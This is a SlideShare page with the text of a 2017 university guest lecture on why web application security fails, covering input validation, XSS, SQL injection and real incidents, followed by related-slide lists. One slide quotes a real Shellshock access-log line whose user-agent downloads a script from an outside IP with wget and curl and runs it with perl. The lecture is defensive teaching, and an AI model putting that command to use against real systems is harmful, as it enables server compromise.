SlideShare ist ein Scribd-Unternehmen logo

Webapp security-tut-2017

L
lokori

Web application security, how and why it fails? Guest lecture at TUT, spring 2017.

Technologie
1 von 37
Downloaden Sie, um offline zu lesen
HOW AND WHY WEB APP SECURITY FAILS? 16.2. 2017 Tampere University of Technology Antti.virtanen@solita.fi Twitter: @Anakondantti
FOREWORD, 1 MINUTE › Solita? › Me? › Web application? • Much more important than you may realize..
AGENDA › How to make secure software? › … But, everything is broken! › … Because ... • Same mistakes are repeated. • Unthinkable, Unpossible, Impossiblator happens › Practical web application security testing. › Bonus: 10. fail 20. goto 10
SECURITY IS RISK MANAGEMENT
”“If you know the enemy and know yourself, you need not fear the result of a hundred battles. ” Sun Tzu, Art of War
Source: Hackerman, Kung Fury movie Source: NSA recruitment video. Source: securityintelligence.com Source: Lizard Squad hacking group logo
SOLITA #DEVSEC LANDSCAPE
GOOD NEWS: SECURITY IS SIMPLE! Bad news: Simple != easy
RECIPE FOR SECURE SOFTWARE 1. Design it properly. Do the right thing. 2. Do it right 1. Mistake in implementation = bug = security issue 3. Prepare for the unthinkable (Bug bounties etc. are useful too, but out of scope here.)
DO THE RIGHT THING 1. Don’t roll your own. 1. Especially, don’t invent hash algorithms, RND or crypto! 2. Seriously. Failure imminent and certain. 2. Follow best practices. 3. Understand what you are doing. 1. Read the RFC. Understand your tools and libs.
SOMETHING UNTHINKABLE It’s the same story every day..
UNTHINKABLE NAMES?
UNTHINKABLE DOMAINS AND DNS RECORDS (PUNY CODE ATTACK)
A PICTURE IS WORTH 1000 WORDS › Demo-time: SVG is a picture file, right? › Feeling lucky, punk?
WHAT THE ACTUAL **** ??
INPUT SANITATION = 80% WIN
THE SAME STORY ALL OVER! › XSS, CSRF, SQL injection, XXE.. • Are all about input validation. › Solution: white list allowed, deny everythingelse. › There’s still 20% left • You can fail session management certainly, but.. • Follow the advice: Don’t invent your own and you’ll be pretty safe.
JAVASCRIPT NECESSARY (?) EVIL
JAVASCRIPT IS FULL OF EVIL (GREPPING “EVIL” FROM JS SOURCES)
The most satisfying feeling you can get in the job is... The Pwn. Let's say you find SQL injection. Blood is rushing into your brain and that's what we call The Pwn. Your brain gets a really tight feeling, like your head is going to explode any minute,. Arnold“Iceman” Schwarzenegger, movie Pwningiron.
DEMO/PRACTICE AGAINST GRUYERE http://google-gruyere.appspot.com/
LET’S XSS ! › Reflected vs. Stored › <script> doesn’t work? • No problem, JS is everywhere.. › Can’t XMLHttpRequest? • No prob, counter and fake
SQL INJECTION › GRUYERE does not contain SQL injection.. › But .. It’s a good example of an injection › SQL = Structured Query Language • However, “query” is a bit of a misnomer.. What is this???
INPUT SANITATION, STILL FAILING
LOGIC ATTACKS ARE DIFFICULT › Real example..
REAL WORLD ATTACK
FROM A REAL ACCESS LOG (CUSTOMER IP REDACTED) › 2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print- wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid: Google tip:Shellshock
WHAT THE ATTACKER WANTED? efixx– first lines.. core – first lines..
DEV OR OPS? OR #DEVSEC ? › Who is responsible for that server? › Do you need to care as a developer? › Ultimately: What is the developer’s responsibility?
SOME FAILS 2016-­2017 Stories from the trenches
FAIL 1: THE BURDEN OF LEGACY MD5 & C++ -­ “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE” › Native code is dangerous.. • ASLR & DEP make buffer overflows more difficult to exploit, but it still happens. › The lifespan of software can be surprisingly long.. • How to update and re-evaluate working software if nothing happens? • Home-exercise: Sell this to team & customer. Involves risk and cost. › New threats have emerged. • What parts are affected?
Screeshot removed.. FAIL 2: SHORTCUTS AND ANARCHY › Root cause: Heavy process, not understood / accepted by devs • making developers miserable.. › The devs are innovative people.. http//unauthorized.. V 1.3 coolserver AwesomeSoftware_Upgrade.exe
FAIL 3: “I ACCIDENTALLY”
STORY 4: THE WEBHACK EVENT › http://webhack.fi was a light-weight fun bug bounty hunt.. • The targets are not publicly accessible, but were production systems we created for our customers. › Hackers hacked.. › .. SQL injection -> dumped the whole database › .. But our code was fine! WAT?
ONE DOES NOT SIMPLY INJECT INTO.. › One issue turned out to be a 0-day in Spring libraries.. › Hnggh.. › The moral of the story is two-fold: 1. even if you do everything right, you can still fail 2. it’s not always so easy in real life.. › The gory details: https://github.com/solita/sqli-poc
FURTHER MATERIAL • Fromthe internet: • OWASP Top10 • https://www.owasp.o rg/index.php/Categor y:OWASP_Top_Ten_ Project • OWASP ZAP proxy • https://www.owasp.o rg/index.php/OWAS P_Zed_Attack_Proxy _Project • KaliLinux • https://www.kali.org /
Webapp security-tut-2017

Empfohlen

Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)
ClubHack
 
Making operations visible - devopsdays tokyo 2013
Making operations visible - devopsdays tokyo 2013Making operations visible - devopsdays tokyo 2013
Making operations visible - devopsdays tokyo 2013
Nick Galbreath
 
Performance - a challenging craft
Performance - a challenging craftPerformance - a challenging craft
Performance - a challenging craft
Fabian Lange
 
Easy way to remove Isearch.babylon.com
Easy way to remove Isearch.babylon.comEasy way to remove Isearch.babylon.com
Easy way to remove Isearch.babylon.com
adelardbrown2
 
Fixing security by fixing software development
Fixing security by fixing software developmentFixing security by fixing software development
Fixing security by fixing software development
Nick Galbreath
 
Let's pwn a chinese web browser!
Let's pwn a chinese web browser!Let's pwn a chinese web browser!
Let's pwn a chinese web browser!
Juho Nurminen
 
Failure the-good-parts
Failure the-good-partsFailure the-good-parts
Failure the-good-parts
legendofklang
 
Good rules for bad apps
Good rules for bad appsGood rules for bad apps
Good rules for bad apps
Shem Magnezi
 

Empfohlen

Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)Mere Paas Teensy Hai (Nikhil Mittal)
Mere Paas Teensy Hai (Nikhil Mittal)
ClubHack
 
Making operations visible - devopsdays tokyo 2013
Making operations visible - devopsdays tokyo 2013Making operations visible - devopsdays tokyo 2013
Making operations visible - devopsdays tokyo 2013
Nick Galbreath
 
Performance - a challenging craft
Performance - a challenging craftPerformance - a challenging craft
Performance - a challenging craft
Fabian Lange
 
Easy way to remove Isearch.babylon.com
Easy way to remove Isearch.babylon.comEasy way to remove Isearch.babylon.com
Easy way to remove Isearch.babylon.com
adelardbrown2
 
Fixing security by fixing software development
Fixing security by fixing software developmentFixing security by fixing software development
Fixing security by fixing software development
Nick Galbreath
 
Let's pwn a chinese web browser!
Let's pwn a chinese web browser!Let's pwn a chinese web browser!
Let's pwn a chinese web browser!
Juho Nurminen
 
Failure the-good-parts
Failure the-good-partsFailure the-good-parts
Failure the-good-parts
legendofklang
 
Good rules for bad apps
Good rules for bad appsGood rules for bad apps
Good rules for bad apps
Shem Magnezi
 
A Responsive Process
A Responsive ProcessA Responsive Process
A Responsive Process
daveruse
 
10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them
Rosie Sherry
 
10 Things I Hate about DevOps
10 Things I Hate about DevOps10 Things I Hate about DevOps
10 Things I Hate about DevOps
Dave Cliffe
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
Way to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.comWay to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.com
adelardbrown2
 
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Jeff Sonstein
 
Avoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on MarketingAvoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on Marketing
Affiliate Summit
 
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Michele Butcher-Jones
 
Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013
Nick Galbreath
 
Hacker Games & DevSecOps
Hacker Games & DevSecOpsHacker Games & DevSecOps
Hacker Games & DevSecOps
lokori
 
Real world software launch
Real world software launchReal world software launch
Real world software launch
Kunal Johar
 
2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development
PROIDEA
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Yevgeniy Brikman
 
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
John Allspaw
 
(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities
Steve Poole
 
DevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web DevelopmentDevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web Development
Johannes Brodwall
 
DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)
Wooga
 
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Jinju Jang
 
What does it mean to be a test engineer?
What does it mean to be a test engineer?What does it mean to be a test engineer?
What does it mean to be a test engineer?
Andrii Dzynia
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignments
n|u - The Open Security Community
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Positive Hack Days
 
Phd final
Phd finalPhd final
Phd final
Positive Hack Days
 

Weitere ähnliche Inhalte

Was ist angesagt?

10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them
Rosie Sherry
 

Was ist angesagt? (8)

A Responsive Process
A Responsive ProcessA Responsive Process
A Responsive Process
 
10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them10 Reasons Why You Fix Bugs As Soon As You Find Them
10 Reasons Why You Fix Bugs As Soon As You Find Them
 
10 Things I Hate about DevOps
10 Things I Hate about DevOps10 Things I Hate about DevOps
10 Things I Hate about DevOps
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
 
Way to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.comWay to remove Mediafileexplosion.com
Way to remove Mediafileexplosion.com
 
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
Mobile Web Apps Best Practices Presentation at Design4Mobile 2009
 
Avoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on MarketingAvoiding Tech Nightmares and Focusing on Marketing
Avoiding Tech Nightmares and Focusing on Marketing
 
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
Intro to Security (Beginner's Edition) WordCamp St. Louis 2015
 

Ähnlich wie Webapp security-tut-2017

Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013
Nick Galbreath
 
2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development
PROIDEA
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Yevgeniy Brikman
 
(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities
Steve Poole
 
DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)
Wooga
 
What does it mean to be a test engineer?
What does it mean to be a test engineer?What does it mean to be a test engineer?
What does it mean to be a test engineer?
Andrii Dzynia
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Positive Hack Days
 

Ähnlich wie Webapp security-tut-2017 (20)

Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013Faster Secure Software Development with Continuous Deployment - PH Days 2013
Faster Secure Software Development with Continuous Deployment - PH Days 2013
 
Hacker Games & DevSecOps
Hacker Games & DevSecOpsHacker Games & DevSecOps
Hacker Games & DevSecOps
 
Real world software launch
Real world software launchReal world software launch
Real world software launch
 
2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development2016 - Daniel Lebrero - REPL driven development
2016 - Daniel Lebrero - REPL driven development
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
 
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
10+ Deploys Per Day: Dev and Ops Cooperation at Flickr
 
(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities(java2days) The Anatomy of Java Vulnerabilities
(java2days) The Anatomy of Java Vulnerabilities
 
DevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web DevelopmentDevDay.lk - Bare Knuckle Web Development
DevDay.lk - Bare Knuckle Web Development
 
DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)DevOps goes Mobile (daho.am)
DevOps goes Mobile (daho.am)
 
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...Framer for the win - Using Framer prototypes for your app project. (For Melbo...
Framer for the win - Using Framer prototypes for your app project. (For Melbo...
 
What does it mean to be a test engineer?
What does it mean to be a test engineer?What does it mean to be a test engineer?
What does it mean to be a test engineer?
 
The hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignmentsThe hardcore stuff i hack, experiences from past VAPT assignments
The hardcore stuff i hack, experiences from past VAPT assignments
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
 
Phd final
Phd finalPhd final
Phd final
 
From dev to ops and beyond - getting it done
From dev to ops and beyond - getting it doneFrom dev to ops and beyond - getting it done
From dev to ops and beyond - getting it done
 
Software Debugging for High-altitude Balloons
Software Debugging for High-altitude BalloonsSoftware Debugging for High-altitude Balloons
Software Debugging for High-altitude Balloons
 
TDD Updated
TDD UpdatedTDD Updated
TDD Updated
 
Project AutoMock and Jasmine: Testing Auto-magically!!
Project AutoMock and Jasmine: Testing Auto-magically!!Project AutoMock and Jasmine: Testing Auto-magically!!
Project AutoMock and Jasmine: Testing Auto-magically!!
 
Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015
 

Mehr von lokori

Turkuagile agile contractmodel_13052014
Turkuagile agile contractmodel_13052014Turkuagile agile contractmodel_13052014
Turkuagile agile contractmodel_13052014
lokori
 

Mehr von lokori (9)

Smart Locks - too clever by half
Smart Locks - too clever by halfSmart Locks - too clever by half
Smart Locks - too clever by half
 
Turvallinen ohjelmointi -vierailuluento, 2019
Turvallinen ohjelmointi -vierailuluento, 2019Turvallinen ohjelmointi -vierailuluento, 2019
Turvallinen ohjelmointi -vierailuluento, 2019
 
Developer is an attack vector
Developer is an attack vectorDeveloper is an attack vector
Developer is an attack vector
 
DevSec - build security in and dance like a pro!
DevSec - build security in and dance like a pro!DevSec - build security in and dance like a pro!
DevSec - build security in and dance like a pro!
 
TTY turvallinen ohjelmointi 2017
TTY turvallinen ohjelmointi 2017TTY turvallinen ohjelmointi 2017
TTY turvallinen ohjelmointi 2017
 
Tga2015 documentationpipeline
Tga2015 documentationpipelineTga2015 documentationpipeline
Tga2015 documentationpipeline
 
Clojure oikeassa projektissa, IT-Päivät 2014
Clojure oikeassa projektissa, IT-Päivät 2014Clojure oikeassa projektissa, IT-Päivät 2014
Clojure oikeassa projektissa, IT-Päivät 2014
 
Turkuagile agile contractmodel_13052014
Turkuagile agile contractmodel_13052014Turkuagile agile contractmodel_13052014
Turkuagile agile contractmodel_13052014
 
Agilelessons scanagile-final 2013
Agilelessons scanagile-final 2013Agilelessons scanagile-final 2013
Agilelessons scanagile-final 2013
 

Kürzlich hochgeladen

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 

Kürzlich hochgeladen (20)

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 

Webapp security-tut-2017

  • 1. HOW AND WHY WEB APP SECURITY FAILS? 16.2. 2017 Tampere University of Technology Antti.virtanen@solita.fi Twitter: @Anakondantti
  • 2. FOREWORD, 1 MINUTE › Solita? › Me? › Web application? • Much more important than you may realize..
  • 3. AGENDA › How to make secure software? › … But, everything is broken! › … Because ... • Same mistakes are repeated. • Unthinkable, Unpossible, Impossiblator happens › Practical web application security testing. › Bonus: 10. fail 20. goto 10
  • 5. ”“If you know the enemy and know yourself, you need not fear the result of a hundred battles. ” Sun Tzu, Art of War
  • 6. Source: Hackerman, Kung Fury movie Source: NSA recruitment video. Source: securityintelligence.com Source: Lizard Squad hacking group logo
  • 8. GOOD NEWS: SECURITY IS SIMPLE! Bad news: Simple != easy
  • 9. RECIPE FOR SECURE SOFTWARE 1. Design it properly. Do the right thing. 2. Do it right 1. Mistake in implementation = bug = security issue 3. Prepare for the unthinkable (Bug bounties etc. are useful too, but out of scope here.)
  • 10. DO THE RIGHT THING 1. Don’t roll your own. 1. Especially, don’t invent hash algorithms, RND or crypto! 2. Seriously. Failure imminent and certain. 2. Follow best practices. 3. Understand what you are doing. 1. Read the RFC. Understand your tools and libs.
  • 11. SOMETHING UNTHINKABLE It’s the same story every day..
  • 13. UNTHINKABLE DOMAINS AND DNS RECORDS (PUNY CODE ATTACK)
  • 14. A PICTURE IS WORTH 1000 WORDS › Demo-time: SVG is a picture file, right? › Feeling lucky, punk?
  • 15. WHAT THE ACTUAL **** ??
  • 17. THE SAME STORY ALL OVER! › XSS, CSRF, SQL injection, XXE.. • Are all about input validation. › Solution: white list allowed, deny everythingelse. › There’s still 20% left • You can fail session management certainly, but.. • Follow the advice: Don’t invent your own and you’ll be pretty safe.
  • 19. JAVASCRIPT IS FULL OF EVIL (GREPPING “EVIL” FROM JS SOURCES)
  • 20. The most satisfying feeling you can get in the job is... The Pwn. Let's say you find SQL injection. Blood is rushing into your brain and that's what we call The Pwn. Your brain gets a really tight feeling, like your head is going to explode any minute,. Arnold“Iceman” Schwarzenegger, movie Pwningiron.
  • 22. LET’S XSS ! › Reflected vs. Stored › <script> doesn’t work? • No problem, JS is everywhere.. › Can’t XMLHttpRequest? • No prob, counter and fake
  • 23. SQL INJECTION › GRUYERE does not contain SQL injection.. › But .. It’s a good example of an injection › SQL = Structured Query Language • However, “query” is a bit of a misnomer.. What is this???
  • 25. LOGIC ATTACKS ARE DIFFICULT › Real example..
  • 27. FROM A REAL ACCESS LOG (CUSTOMER IP REDACTED) › 2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print- wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid: Google tip:Shellshock
  • 28. WHAT THE ATTACKER WANTED? efixx– first lines.. core – first lines..
  • 29. DEV OR OPS? OR #DEVSEC ? › Who is responsible for that server? › Do you need to care as a developer? › Ultimately: What is the developer’s responsibility?
  • 30. SOME FAILS 2016-­2017 Stories from the trenches
  • 31. FAIL 1: THE BURDEN OF LEGACY MD5 & C++ -­ “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE” › Native code is dangerous.. • ASLR & DEP make buffer overflows more difficult to exploit, but it still happens. › The lifespan of software can be surprisingly long.. • How to update and re-evaluate working software if nothing happens? • Home-exercise: Sell this to team & customer. Involves risk and cost. › New threats have emerged. • What parts are affected?
  • 32. Screeshot removed.. FAIL 2: SHORTCUTS AND ANARCHY › Root cause: Heavy process, not understood / accepted by devs • making developers miserable.. › The devs are innovative people.. http//unauthorized.. V 1.3 coolserver AwesomeSoftware_Upgrade.exe
  • 33. FAIL 3: “I ACCIDENTALLY”
  • 34. STORY 4: THE WEBHACK EVENT › http://webhack.fi was a light-weight fun bug bounty hunt.. • The targets are not publicly accessible, but were production systems we created for our customers. › Hackers hacked.. › .. SQL injection -> dumped the whole database › .. But our code was fine! WAT?
  • 35. ONE DOES NOT SIMPLY INJECT INTO.. › One issue turned out to be a 0-day in Spring libraries.. › Hnggh.. › The moral of the story is two-fold: 1. even if you do everything right, you can still fail 2. it’s not always so easy in real life.. › The gory details: https://github.com/solita/sqli-poc
  • 36. FURTHER MATERIAL • Fromthe internet: • OWASP Top10 • https://www.owasp.o rg/index.php/Categor y:OWASP_Top_Ten_ Project • OWASP ZAP proxy • https://www.owasp.o rg/index.php/OWAS P_Zed_Attack_Proxy _Project • KaliLinux • https://www.kali.org /